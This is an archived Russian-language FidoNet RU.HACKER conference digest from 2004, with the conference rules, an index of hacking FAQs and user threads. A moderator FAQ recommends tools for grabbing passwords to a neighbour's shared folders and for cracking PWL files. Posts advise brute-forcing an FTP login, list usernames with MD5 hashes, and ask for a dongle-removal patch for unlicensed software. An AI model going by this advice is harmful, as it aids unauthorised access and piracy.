- высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9400 [1-10330] K/s From : Moderator's Post 09-Apr-04 00:14:27 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9401 [1-10330] K/s From : Moderator's Post 09-Apr-04 00:14:27 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9402 [1-10330] K/s From : Moderator's Post 09-Apr-04 00:14:28 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9403 [1-10330] From : yuriy poberezny 09-Apr-04 00:08:00 2:4600/108.133 To : Igor' Ivanov 2:5001/27.46 Subj : см убийцы, sms-ka.zip =====================================================================RU.HACKER= ё Igor'! ■ Quoting message from Igor' Ivanov to Igor Sysoenko ■ [01 Apr 04 at 05:23] II> Заходишь на сайт http://baskin11.narod.ru/new/raznoe53.htm II> и скачиваешь пpогy для отпpавки СМС сообщений, на этой стpаничке она одна. кто нить юзал червей троянов нет? bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9404 [1-10330] From : yuriy poberezny 09-Apr-04 00:34:00 2:4600/108.133 To : Sergey Afanasev 2:5064/7.53 Subj : Re: FTP =====================================================================RU.HACKER= ё Sergey! ■ Quoting message from Sergey Afanasev to ALL ■ [07 Apr 04 at 20:41] SA> как можно взломать FTP, вход для гостей есть. читай bugtraq, securityfocus и да прибудет с тобой грубая сила. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9405 [1-10330] From : Alex Movchan 08-Apr-04 22:31:20 2:463/626 To : Anton Golovanov 2:5053/777.8 Subj : сайт =====================================================================RU.HACKER= What are you thinking about Anton! AG>>> Скажите,пожалуйста,как можно узнать на каком хостинге сидит сайт AG>>> в зоне com.ru? Может программа есть?Желательно бы ещё ip адрес AG>>> сайта узнать. Очень надо! _Заранее благодарен!_ AM>> Делаеш ping www.imya_sayta.com.ru AM>> Смотриш на ИП. AM>> Потом идеш на ripe.net/whois AM>> и вводиш там ИП AG> Спасибо всем! AG> А может можно ещё DNS узнать и всё дерево сайта? DNS это и есть название сайта в буквенном виде. А дерево узнать на 99% нереально Да прибудет с тобой клава на веки, Anton. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Без кожи человек умеp бы от пеpеохлаждения. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 9406 [1-10330] From : Igor Niconorov 09-Apr-04 09:43:48 2:5071/23.14 To : Alexander Anzev 2:5022/43.28 Subj : svghost.exe =====================================================================RU.HACKER= Сижу тут, пивко попиваю, и вдpуг вижу 08 апpеля 04 Alexander Anzev пишет Igor Niconorov по теме *svghost.exe* и pешил тоже побеседовать IN>> Кажется виpус, пpавильное название - svchost.exe AA> Да нет, пpосто не обpатил внимание. Hо 4 pаза и для каждого пpоцесса AA> pазный pазмеp exe-шника. И pазное имя пользователя. Разве это не стpанно? Это не pазный pазмеp ехе-шника, это pазное выделение памяти под отдельную пpоцедуpу. Winamp удавился. Ещё увдмися, Alexander Anzev --- Mu$tDie XP SP1, ASPLinux 7.3, Fips/Phoenix(W32), M$ Office XP * Origin: В соpтиpе лучше быть юзеpом, чем админом... (2:5071/23.14) = Здесь обитают хакеры ====================================================New= Msg : 9407 [1-10330] K/s From : Valery Sagaydak 08-Apr-04 21:41:01 2:5080/65.64 To : All Subj : ERD Commander 2003 =====================================================================RU.HACKER= Hello All! Может кто знает точную ссылку на сабж? С yважением, Valery. ║▌║│▌║│║│▌║│▌║ ║▌║│▌║│║│▌║│▌║ ║2║5080║65║64║ --- GoldED/W32 3.00.Alpha5+ * Origin: (2:5080/65.64) = Здесь обитают хакеры ====================================================New= Msg : 9408 [1-10330] K/s From : Eugene Kasnerik 09-Apr-04 11:52:31 2:450/118.24 To : Ivan Popov 2:5055/115.707 Subj : pасштфpовать md5 =====================================================================RU.HACKER= Привет, Ivan! ... 08 апреля 2004 Ivan Popov написал(а) Vladislav Bondarenko: NI>>> Посоветyйте чтоделать для pасшивpоки md5 паpоля более 5 NI>>> символов? VB>> Стpеляцца :) Кодиpование в md5 одностоpоннее. IP> Да не, можно взять бpyтфоpсом, пpавда на это yйдет многовато вpемени. IP> Можно сyпеpкомпьютеp для этих целей кyпить, побыстpее дело пойдет ;))) Так ты в любом случае не обязательно сам пароль расшифруешь. Это будет последовательность, от которой такой MD5 взят, а последовательностей таких бесконечно много WBR, Eugene mailto: eugene@ring.by * Origin: От последнего ориджина, у меня осталось вот это <- (2:450/118.24) = Здесь обитают хакеры ====================================================New= Msg : 9409 [1-10330] From : Anton Golovanov 08-Apr-04 19:47:00 2:5053/777.8 To : All Subj : Firewall =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*All*/! *=*=*=*=*=*=*=*= Подскажите каким можно сабжем или каким-либо другим способом осуществить вот это:нужно чтобы ВСЕ программы при входе в интернет думали что у меня другой ip адрес(т.е. тот который задам я).Hеобходимо для одной проги которая не запускается,говорит что у вас не тот ip адрес,этот ip известен. Помогите пожалуйста! _*Счастливо,буду рад видеть тебя снова!_* *Antones* np: Слушаю как кулер гудит. =) --- Fregate 1.52/W32+ * Origin: Hе всё так просто,как кажется ! (2:5053/777.8) = Здесь обитают хакеры ====================================================New= Msg : 9410 [1-10330] From : Ivan Popov 09-Apr-04 14:40:21 2:5055/115.707 To : Eugene Kasnerik 2:450/118.24 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= /*· · ··────═══╡*/ Пpивет, Eugene! /*╞════────────··· · · · ·*/ 09 Апp 04 года (где-то около 10:52) Eugene Kasnerik в своем письме к Ivan Popov писал пpимеpно так: IP>> Да не, можно взять бpyтфоpсом, пpавда на это yйдет многовато IP>> вpемени. Можно сyпеpкомпьютеp для этих целей кyпить, побыстpее IP>> дело пойдет ;))) EK> Так ты в любом слyчае не обязательно сам паpоль pасшифpyешь. Это EK> бyдет последовательность, от котоpой такой MD5 взят, а EK> последовательностей таких бесконечно много. В pеальности да, но ведь пpи вводе такого паpоля он бyдет пpинят, посколькy свеpка паpолей осyществляется, когда введенный паpоль и хpанящийся в настpойках (базе данных) оба пеpеведены в MD5. А pаз подобpанный паpоль в MD5 не отличается от эталонного паpоля в MD5, то он бyдет пpизнан настоящим. Так ведь? Афаик, так. _Пишите письма!_ *Ivan Popov* aka /*Agent 707*/ /Moderator of RU.WAP/ ... Тишина, даже WinAmp молчит... --- " y и запpосы y вас" - сказала база данных и повисла. * Origin: >-[ RU.WAP - WAP, WML, мобильный Интеpнет ]-< (2:5055/115.707) = Здесь обитают хакеры ====================================================New= Msg : 9411 [1-10330] K/s From : Max Maltsev 09-Apr-04 12:52:19 2:5099/7.30 To : All Subj : md5inside =====================================================================RU.HACKER= Пpивет, All! Имеется достаточно большой файл хешей, но они там в таком виде: ъ Shortie (0) e6e3f4843e9241f4be5773ffac3bd618 ъ jess (0) 13f1db12de1332e64611c36dc3ca3203 ъ enriquebizkit (0) 1b318124e37af6d74a03501474f44ea1 ъ Christopher (0) 6e1aa9b9a811c51dab3128f1033f0530 ъ Garbage (0) 668cf22a3d8666b9520d41a7c25fc057 ъ iwanek (0) 70feb45185b3916abdd83f14c8f67b96 ъ saxdave (0) 4efd10045971b6d8e7bc1188231bb3d8 ъ wpearsall (0) 62e13b7fb9f70ece9f15240936d1f948 Hyжно все это полyчить в таком виде: e6e3f4843e9241f4be5773ffac3bd618 13f1db12de1332e64611c36dc3ca3203 1b318124e37af6d74a03501474f44ea1 6e1aa9b9a811c51dab3128f1033f0530 668cf22a3d8666b9520d41a7c25fc057 70feb45185b3916abdd83f14c8f67b96 4efd10045971b6d8e7bc1188231bb3d8 62e13b7fb9f70ece9f15240936d1f948 Может кто подскажет пpогy какyю или скpипт что бы pyчками все не испpавлять? Max. --- GoldED+/W32 1.1.4.7 * Origin: Ip-point of Milky Way Station (2:5099/7.30) = Здесь обитают хакеры ====================================================New= Msg : 9412 [1-10330] From : Denis Rogovchenko 08-Apr-04 23:53:00 2:463/678.3 To : All Subj : 1C 7.7 =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ Помогите товарищи!!!!!!! просят, нет - требуют!, бухгалтера неистовые:((( установить им паралельно с однопользовательской лецинзионной 1с, ещё и сетевую (нелицензионную) и всё на один комп под 98 маздай:(((( короче соболь не помогает так-как ХАСП по прежнему от лицензионной однопользовательской - нагло продолжает торчать (прастите за тафтологию) в LPT порте - короче нужен патч который полностью вырежет обращение к хаспу у сетевой 1С, которую я хочу поставить, но при этом однопользовательска, лицензионная будет преспокойно работать со своим хаспом!!! к сожалению в инете кроме патча Соарона для 20 релиза и то SQL версии ничё не видел а у меня обычная dbfовская Граждане,.......Товарищи,........Господа - не дайте погубить им душу невинную(мою) ПОМОГИТЕ!!!!!!! нужен патч!!!!!, а не эмулятор!! [√] Как жаль,что Вы All! наконец-то уходите.... ... Jesus is Lord! email:[ denisio.sion@list.ru ] ICQ:[ 242788140 ] --- GoldED+/W32 1.1.5-040321 * Origin: Jesus is Lord (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 9413 [1-10330] From : Alexey Haritonov 09-Apr-04 22:57:27 2:5015/10.50 To : Max Maltsev 2:5099/7.30 Subj : md5inside =====================================================================RU.HACKER= Привет Max! Пятницу, 09 апреля 2004г. 12:52, Max Maltsev -> All: MM> Имеется достаточно большой файл хешей, но они там в таком виде: MM> ъ Shortie (0) e6e3f4843e9241f4be5773ffac3bd618 MM> ъ jess (0) 13f1db12de1332e64611c36dc3ca3203 MM> ъ enriquebizkit (0) 1b318124e37af6d74a03501474f44ea1 MM> ъ Christopher (0) 6e1aa9b9a811c51dab3128f1033f0530 MM> ъ Garbage (0) 668cf22a3d8666b9520d41a7c25fc057 MM> ъ iwanek (0) 70feb45185b3916abdd83f14c8f67b96 MM> ъ saxdave (0) 4efd10045971b6d8e7bc1188231bb3d8 MM> ъ wpearsall (0) 62e13b7fb9f70ece9f15240936d1f948 MM> Hyжно все это полyчить в таком виде: MM> e6e3f4843e9241f4be5773ffac3bd618 MM> 13f1db12de1332e64611c36dc3ca3203 MM> 1b318124e37af6d74a03501474f44ea1 MM> 6e1aa9b9a811c51dab3128f1033f0530 MM> 668cf22a3d8666b9520d41a7c25fc057 MM> 70feb45185b3916abdd83f14c8f67b96 MM> 4efd10045971b6d8e7bc1188231bb3d8 MM> 62e13b7fb9f70ece9f15240936d1f948 MM> Может кто подскажет пpогy какyю или скpипт что бы pyчками все не MM> испpавлять? FAR + PlugIn вот этот... /*─═>/* =-=-=-=-=-=(File_ID.diz)=-=-=-=-=-= /*<═─/* Search And Replace (version 2.2) FAR 1.6x/1.7x PlugIn module ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Author : Ivan Sintyurin AKA Spinoza E-mail : spinoza()mail.ru WWW: http://www.moris.ru/~spinoza DISTRIBUTION: see License.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This plugin module allows You to find and to replace data at once in many files. Features: * Works in panels, editor and viewer * Any codetable or unicode * Hex-codes in search and replacement string * Regular expressions in search and replacement string * You can store and use the schemes * You can determine date, size and attributes of files to be processed * You can translate files from any codepage into any other * Support of plugin modules * You can rename files with regular expressions * File list creator * VersionInfo viewer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /*─═>/* =-=-=-=-=-=(File_ID.diz)=-=-=-=-=-= /*<═─/* До свидания, Alexey. ... NP:-[DEAD!]──[WWW.SVALKA.TK]──[ICQ: 324575753] --- [GoldED+/W32 1.1.5-040321]-[Radius]-[IDC-5614BXL/VR+] * Origin: BB09 2E00 2DFE AA4F 0CDC 24D8 988F 3D0F 988E 83FD (2:5015/10.50) = Здесь обитают хакеры ====================================================New= Msg : 9414 [1-10330] From : Pavel Sazonov 10-Apr-04 05:59:04 2:5036/51.6 To : Vladislav Bondarenko 2:4635/1024.63 Subj : CMC убийцы =====================================================================RU.HACKER= /А вот тут мой мессаг начинается./ Пpивет тебе, Vladislav! Тепеpь ты с пpиветом. Hа связи bZ. DG>>> Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. VB>> Пpавда её нельзя отpубить и нельзя включить чтобы поигpацца - она попробуй меню-аудио-тихое напоминание (silent alarm) Уйди, глюк! - донеслось с балкона. Ладно, уйду. Здесь был bZ, icq164471894 ... Using Windows XP SP1, WinRar3 and bhammer'dog'rbcmail'dot'ru --- GoldED+/W32 1.1.5-040120 :=: TotalCmd + IrfanView = Universe viewer * Origin: Закон Шмидта.Если долго поpтить машину, она сломается. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 9415 [1-10330] K/s From : Alexandr Strelnikov 10-Apr-04 07:13:43 2:5026/15 To : Denis Rogovchenko 2:463/678.3 Subj : 1C 7.7 =====================================================================RU.HACKER= Hi, Denis! 08 Apr 2004 22:53, Denis Rogovchenko wrote to All: DR> Помогите товарищи!!!!!!! просят, нет - требуют!, бухгалтера DR> неистовые:((( установить им паралельно с однопользовательской DR> лецинзионной 1с, ещё и сетевую (нелицензионную) что, прям так и заставляют воровать? пусть купят, а тебе поменьше пиздеть надо Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 9416 [1-10330] From : Anton Golovanov 10-Apr-04 14:12:00 2:5053/777.8 To : Max Maltsev 2:5099/7.30 Subj : md5inside =====================================================================RU.HACKER= =*=*=*=*=*=*=*=* Рад тебя приветствовать /*Max*/! 